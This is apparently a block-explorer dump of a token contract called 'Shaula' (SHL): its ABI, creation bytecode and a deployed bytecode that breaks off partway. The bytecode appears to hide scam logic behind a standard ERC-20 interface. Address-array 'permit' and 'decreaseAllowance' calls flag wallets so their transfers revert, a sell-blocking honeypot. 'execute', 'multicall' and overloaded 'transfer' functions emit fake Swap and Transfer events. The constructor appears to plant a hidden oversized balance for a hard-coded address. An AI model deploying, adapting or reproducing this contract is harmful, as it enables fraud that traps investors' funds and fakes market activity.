[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ReentrancyGuardReentrantCall","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"permited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner_","type":"address"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_from","type":"address[]"},{"internalType":"address[]","name":"_to","type":"address[]"},{"internalType":"uint256[]","name":"_wad","type":"uint256[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040525f60055f6101000a81548160ff02191690831515021790555034801562000029575f80fd5b506040518060400160405280600681526020017f536861756c6100000000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f53484c00000000000000000000000000000000000000000000000000000000008152508181620000b8620000ac6200012f60201b60201c565b6200013660201b60201c565b8160069081620000c9919062000614565b508060079081620000db919062000614565b505050505060016009819055506200012933620000fd620001f760201b60201c565b600a6200010b919062000881565b64e8d4a510006200011d9190620008d1565b620001ff60201b60201c565b620009ff565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000270576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002679062000979565b60405180910390fd5b620002835f8383620003a660201b60201c565b630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508060045f828254620002d7919062000999565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003879190620009e4565b60405180910390a3620003a25f8383620003ab60201b60201c565b5050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200042c57607f821691505b602082108103620004425762000441620003e7565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004a67fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000469565b620004b2868362000469565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620004fc620004f6620004f084620004ca565b620004d3565b620004ca565b9050919050565b5f819050919050565b6200051783620004dc565b6200052f620005268262000503565b84845462000475565b825550505050565b5f90565b6200054562000537565b620005528184846200050c565b505050565b5b8181101562000579576200056d5f826200053b565b60018101905062000558565b5050565b601f821115620005c857620005928162000448565b6200059d846200045a565b81016020851015620005ad578190505b620005c5620005bc856200045a565b83018262000557565b50505b505050565b5f82821c905092915050565b5f620005ea5f1984600802620005cd565b1980831691505092915050565b5f620006048383620005d9565b9150826002028217905092915050565b6200061f82620003b0565b67ffffffffffffffff8111156200063b576200063a620003ba565b5b62000647825462000414565b620006548282856200057d565b5f60209050601f8311600181146200068a575f841562000675578287015190505b620006818582620005f7565b865550620006f0565b601f1984166200069a8662000448565b5f5b82811015620006c3578489015182556001820191506020850194506020810190506200069c565b86831015620006e35784890151620006df601f891682620005d9565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000782578086048111156200075a5762000759620006f8565b5b60018516156200076a5780820291505b80810290506200077a8562000725565b94506200073a565b94509492505050565b5f826200079c57600190506200086e565b81620007ab575f90506200086e565b8160018114620007c45760028114620007cf5762000805565b60019150506200086e565b60ff841115620007e457620007e3620006f8565b5b8360020a915084821115620007fe57620007fd620006f8565b5b506200086e565b5060208310610133831016604e8410600b84101617156200083f5782820a905083811115620008395762000838620006f8565b5b6200086e565b6200084e848484600162000731565b92509050818404811115620008685762000867620006f8565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200088d82620004ca565b91506200089a8362000875565b9250620008c97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200078b565b905092915050565b5f620008dd82620004ca565b9150620008ea83620004ca565b9250828202620008fa81620004ca565b91508282048414831517620009145762000913620006f8565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000961601f836200091b565b91506200096e826200092b565b602082019050919050565b5f6020820190508181035f830152620009928162000953565b9050919050565b5f620009a582620004ca565b9150620009b283620004ca565b9250828201905080821115620009cd57620009cc620006f8565b5b92915050565b620009de81620004ca565b82525050565b5f602082019050620009f95f830184620009d3565b92915050565b6121788062000a0d5f395ff3fe608060405234801561000f575f80fd5b5060043610610140575f3560e01c80637111a994116100b6578063a457c2d71161007a578063a457c2d71461034c578063a9059cbb1461037c578063beabacc8146103ac578063dd62ed3e146103c8578063f2fde38b146103f8578063f6ee6ba81461041457610140565b80637111a994146102ce578063715018a6146102ea57806373ed6b13146102f45780638da5cb5b1461031057806395d89b411461032e57610140565b8063313ce56711610108578063313ce567146101fc57806338bf3cfa1461021a5780633950935114610236578063477e194414610266578063618a2f5e1461028257806370a082311461029e57610140565b806306fdde0314610144578063095ea7b31461016257806318160ddd1461019257806320ea14e7146101b057806323b872dd146101cc575b5f80fd5b61014c610444565b60405161015991906115be565b60405180910390f35b61017c60048036038101906101779190611673565b6104d4565b60405161018991906116cb565b60405180910390f35b61019a6104f6565b6040516101a791906116f3565b60405180910390f35b6101ca60048036038101906101c5919061176d565b6104ff565b005b6101e660048036038101906101e191906117b8565b6105a8565b6040516101f391906116cb565b60405180910390f35b6102046105d6565b6040516102119190611823565b60405180910390f35b610234600480360381019061022f919061183c565b6105de565b005b610250600480360381019061024b9190611673565b610629565b60405161025d91906116cb565b60405180910390f35b610280600480360381019061027b919061176d565b61065f565b005b61029c60048036038101906102979190611867565b610707565b005b6102b860048036038101906102b3919061183c565b61086e565b6040516102c591906116f3565b60405180910390f35b6102e860048036038101906102e39190611940565b6108b4565b005b6102f26109a9565b005b61030e60048036038101906103099190611867565b6109bc565b005b610318610b23565b60405161032591906119ff565b60405180910390f35b610336610b4a565b60405161034391906115be565b60405180910390f35b61036660048036038101906103619190611673565b610bda565b60405161037391906116cb565b60405180910390f35b61039660048036038101906103919190611673565b610c4f565b6040516103a391906116cb565b60405180910390f35b6103c660048036038101906103c191906117b8565b610c71565b005b6103e260048036038101906103dd9190611a18565b610cdb565b6040516103ef91906116f3565b60405180910390f35b610412600480360381019061040d919061183c565b610d5d565b005b61042e6004803603810190610429919061183c565b610ddf565b60405161043b91906116cb565b60405180910390f35b60606006805461045390611a83565b80601f016020809104026020016040519081016040528092919081815260200182805461047f90611a83565b80156104ca5780601f106104a1576101008083540402835291602001916104ca565b820191905f5260205f20905b8154815290600101906020018083116104ad57829003601f168201915b5050505050905090565b5f806104de610e31565b90506104eb818585610e38565b600191505092915050565b5f600454905090565b610507610ffb565b5f5b828290508110156105a357600160025f85858581811061052c5761052b611ab3565b5b9050602002016020810190610541919061183c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061059b90611b0d565b915050610509565b505050565b5f806105b2610e31565b90506105bf858285611079565b6105ca858585611104565b60019150509392505050565b5f6012905090565b6105e6610ffb565b8060085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f80610633610e31565b90506106548185856106458589610cdb565b61064f9190611b54565b610e38565b600191505092915050565b610667610ffb565b5f5b82829050811015610702575f60025f85858581811061068b5761068a611ab3565b5b90506020020160208101906106a0919061183c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806106fa90611b0d565b915050610669565b505050565b5f5b848490508110156108665784848281811061072757610726611ab3565b5b905060200201602081019061073c919061183c565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822855f808760405161079e9493929190611bc9565b60405180910390a38484828181106107b9576107b8611ab3565b5b90506020020160208101906107ce919061183c565b73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161084b91906116f3565b60405180910390a3808061085e90611b0d565b915050610709565b505050505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f5b868690508110156109a0578484828181106108d4576108d3611ab3565b5b90506020020160208101906108e9919061183c565b73ffffffffffffffffffffffffffffffffffffffff1687878381811061091257610911611ab3565b5b9050602002016020810190610927919061183c565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061097157610970611ab3565b5b9050602002013560405161098591906116f3565b60405180910390a3808061099890611b0d565b9150506108b6565b50505050505050565b6109b1610ffb565b6109ba5f611469565b565b5f5b84849050811015610b1b578484828181106109dc576109db611ab3565b5b90506020020160208101906109f1919061183c565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8225f86865f604051610a539493929190611c0c565b60405180910390a360085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610aa657610aa5611ab3565b5b9050602002016020810190610abb919061183c565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610b0091906116f3565b60405180910390a38080610b1390611b0d565b9150506109be565b505050505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b5990611a83565b80601f0160208091040260200160405190810160405280929190818152602001828054610b8590611a83565b8015610bd05780601f10610ba757610100808354040283529160200191610bd0565b820191905f5260205f20905b815481529060010190602001808311610bb357829003601f168201915b5050505050905090565b5f80610be4610e31565b90505f610bf18286610cdb565b905083811015610c36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2d90611cbf565b60405180910390fd5b610c438286868403610e38565b60019250505092915050565b5f80610c59610e31565b9050610c66818585611104565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cce91906116f3565b60405180910390a3505050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610d65610ffb565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610dd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dca90611d4d565b60405180910390fd5b610ddc81611469565b50565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ea6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9d90611ddb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0b90611e69565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fee91906116f3565b60405180910390a3505050565b611003610e31565b73ffffffffffffffffffffffffffffffffffffffff16611021610b23565b73ffffffffffffffffffffffffffffffffffffffff1614611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e90611ed1565b60405180910390fd5b565b5f6110848484610cdb565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110fe57818110156110f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e790611f39565b60405180910390fd5b6110fd8484848403610e38565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611172576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116990611fc7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d790612055565b60405180910390fd5b6111eb83838361152a565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561126f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611266906120e3565b60405180910390fd5b60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061130a575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15611365576001151560055f9054906101000a900460ff16151514611364576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135b90612124565b60405180910390fd5b5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161145091906116f3565b60405180910390a361146384848461152f565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561156b578082015181840152602081019050611550565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61159082611534565b61159a818561153e565b93506115aa81856020860161154e565b6115b381611576565b840191505092915050565b5f6020820190508181035f8301526115d68184611586565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61160f826115e6565b9050919050565b61161f81611605565b8114611629575f80fd5b50565b5f8135905061163a81611616565b92915050565b5f819050919050565b61165281611640565b811461165c575f80fd5b50565b5f8135905061166d81611649565b92915050565b5f8060408385031215611689576116886115de565b5b5f6116968582860161162c565b92505060206116a78582860161165f565b9150509250929050565b5f8115159050919050565b6116c5816116b1565b82525050565b5f6020820190506116de5f8301846116bc565b92915050565b6116ed81611640565b82525050565b5f6020820190506117065f8301846116e4565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261172d5761172c61170c565b5b8235905067ffffffffffffffff81111561174a57611749611710565b5b60208301915083602082028301111561176657611765611714565b5b9250929050565b5f8060208385031215611783576117826115de565b5b5f83013567ffffffffffffffff8111156117a05761179f6115e2565b5b6117ac85828601611718565b92509250509250929050565b5f805f606084860312156117cf576117ce6115de565b5b5f6117dc8682870161162c565b93505060206117ed8682870161162c565b92505060406117fe8682870161165f565b9150509250925092565b5f60ff82169050919050565b61181d81611808565b82525050565b5f6020820190506118365f830184611814565b92915050565b5f60208284031215611851576118506115de565b5b5f61185e8482850161162c565b91505092915050565b5f805f805f608086880312156118805761187f6115de565b5b5f61188d8882890161162c565b955050602086013567ffffffffffffffff8111156118ae576118ad6115e2565b5b6118ba88828901611718565b945094505060406118cd8882890161165f565b92505060606118de8882890161165f565b9150509295509295909350565b5f8083601f840112611900576118ff61170c565b5b8235905067ffffffffffffffff81111561191d5761191c611710565b5b60208301915083602082028301111561193957611938611714565b5b9250929050565b5f805f805f806060878903121561195a576119596115de565b5b5f87013567ffffffffffffffff811115611977576119766115e2565b5b61198389828a01611718565b9650965050602087013567ffffffffffffffff8111156119a6576119a56115e2565b5b6119b289828a01611718565b9450945050604087013567ffffffffffffffff8111156119d5576119d46115e2565b5b6119e189828a016118eb565b92509250509295509295509295565b6119f981611605565b82525050565b5f602082019050611a125f8301846119f0565b92915050565b5f8060408385031215611a2e57611a2d6115de565b5b5f611a3b8582860161162c565b9250506020611a4c8582860161162c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611a9a57607f821691505b602082108103611aad57611aac611a56565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611b1782611640565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611b4957611b48611ae0565b5b600182019050919050565b5f611b5e82611640565b9150611b6983611640565b9250828201905080821115611b8157611b80611ae0565b5b92915050565b5f819050919050565b5f819050919050565b5f611bb3611bae611ba984611b87565b611b90565b611640565b9050919050565b611bc381611b99565b82525050565b5f608082019050611bdc5f8301876116e4565b611be96020830186611bba565b611bf66040830185611bba565b611c0360608301846116e4565b95945050505050565b5f608082019050611c1f5f830187611bba565b611c2c60208301866116e4565b611c3960408301856116e4565b611c466060830184611bba565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611ca960258361153e565b9150611cb482611c4f565b604082019050919050565b5f6020820190508181035f830152611cd681611c9d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611d3760268361153e565b9150611d4282611cdd565b604082019050919050565b5f6020820190508181035f830152611d6481611d2b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611dc560248361153e565b9150611dd082611d6b565b604082019050919050565b5f6020820190508181035f830152611df281611db9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611e5360228361153e565b9150611e5e82611df9565b604082019050919050565b5f6020820190508181035f830152611e8081611e47565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611ebb60208361153e565b9150611ec682611e87565b602082019050919050565b5f6020820190508181035f830152611ee881611eaf565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611f23601d8361153e565b9150611f2e82611eef565b602082019050919050565b5f6020820190508181035f830152611f5081611f17565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611fb160258361153e565b9150611fbc82611f57565b604082019050919050565b5f6020820190508181035f830152611fde81611fa5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61203f60238361153e565b915061204a82611fe5565b604082019050919050565b5f6020820190508181035f83015261206c81612033565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6120cd60268361153e565b91506120d882612073565b604082019050919050565b5f6020820190508181035f8301526120fa816120c1565b9050919050565b50565b5f61210f5f8361153e565b915061211a82612101565b5f82019050919050565b5f6020820190508181035f83015261213b81612104565b905091905056fea264697066735822122032779bf25f9e83cf4c4d8726ffdbbe36261a55a98f97c215c3ee7472c1ab50ca64736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610140575f3560e01c80637111a994116100b6578063a457c2d71161007a578063a457c2d71461034c578063a9059cbb1461037c578063beabacc8146103ac578063dd62ed3e146103c8578063f2fde38b146103f8578063f6ee6ba81461041457610140565b80637111a994146102ce578063715018a6146102ea57806373ed6b13146102f45780638da5cb5b1461031057806395d89b411461032e57610140565b8063313ce56711610108578063313ce567146101fc57806338bf3cfa1461021a5780633950935114610236578063477e194414610266578063618a2f5e1461028257806370a082311461029e57610140565b806306fdde0314610144578063095ea7b31461016257806318160ddd1461019257806320ea14e7146101b057806323b872dd146101cc575b5f80fd5b61014c610444565b60405161015991906115be565b60405180910390f35b61017c60048036038101906101779190611673565b6104d4565b60405161018991906116cb565b60405180910390f35b61019a6104f6565b6040516101a791906116f3565b60405180910390f35b6101ca60048036038101906101c5919061176d565b6104ff565b005b6101e660048036038101906101e191906117b8565b6105a8565b6040516101f391906116cb565b60405180910390f35b6102046105d6565b6040516102119190611823565b60405180910390f35b610234600480360381019061022f919061183c565b6105de565b005b610250600480360381019061024b9190611673565b610629565b60405161025d91906116cb565b60405180910390f35b610280600480360381019061027b919061176d565b61065f565b005b61029c60048036038101906102979190611867565b610707565b005b6102b860048036038101906102b3919061183c565b61086e565b6040516102c591906116f3565b60405180910390f35b6102e860048036038101906102e39190611940565b6108b4565b005b6102f26109a9565b005b61030e60048036038101906103099190611867565b6109bc565b005b610318610b23565b60405161032591906119ff565b60405180910390f35b610336610b4a565b60405161034391906115be565b60405180910390f35b61036660048036038101906103619190611673565b610bda565b60405161037391906116cb565b60405180910390f35b61039660048036038101906103919190611673565b610c4f565b6040516103a391906116cb565b60405180910390f35b6103c660048036038101906103c191906117b8565b610c71565b005b6103e260048036038101906103dd9190611a18565b610cdb565b6040516103ef91906116f3565b60405180910390f35b610412600480360381019061040d919061183c565b610d5d565b005b61042e6004803603810190610429919061183c565b610ddf565b60405161043b91906116cb565b60405180910390f35b60606006805461045390611a83565b80601f016020809104026020016040519081016040528092919081815260200182805461047f90611a83565b80156104ca5780601f106104a1576101008083540402835291602001916104ca565b820191905f5260205f20905b8154815290600101906020018083116104ad57829003601f168201915b5050505050905090565b5f806104de610e31565b90506104eb818585610e38565b600191505092915050565b5f600454905090565b610507610ffb565b5f5b828290508110156105a357600160025f85858581811061052c5761052b611ab3565b5b9050602002016020810190610541919061183c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061059b90611b0d565b915050610509565b505050565b5f806105b2610e31565b90506105bf858285611079565b6105ca858585611104565b60019150509392505050565b5f6012905090565b6105e6610ffb565b8060085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f80610633610e31565b90506106548185856106458589610cdb565b61064f9190611b54565b610e38565b600191505092915050565b610667610ffb565b5f5b82829050811015610702575f60025f85858581811061068b5761068a611ab3565b5b90506020020160208101906106a0919061183c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806106fa90611b0d565b915050610669565b505050565b5f5b848490508110156108665784848281811061072757610726611ab3565b5b905060200201602081019061073c919061183c565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822855f808760405161079e9493929190611bc9565b60405180910390a38484828181106107b9576107b8611ab3565b5b90506020020160208101906107ce919061183c565b73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161084b91906116f3565b60405180910390a3808061085e90611b0d565b915050610709565b505050505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f5b868690508110156109a0578484828181106108d4576108d3611ab3565b5b90506020020160208101906108e9919061183c565b73ffffffffffffffffffffffffffffffffffffffff1687878381811061091257610911611ab3565b5b90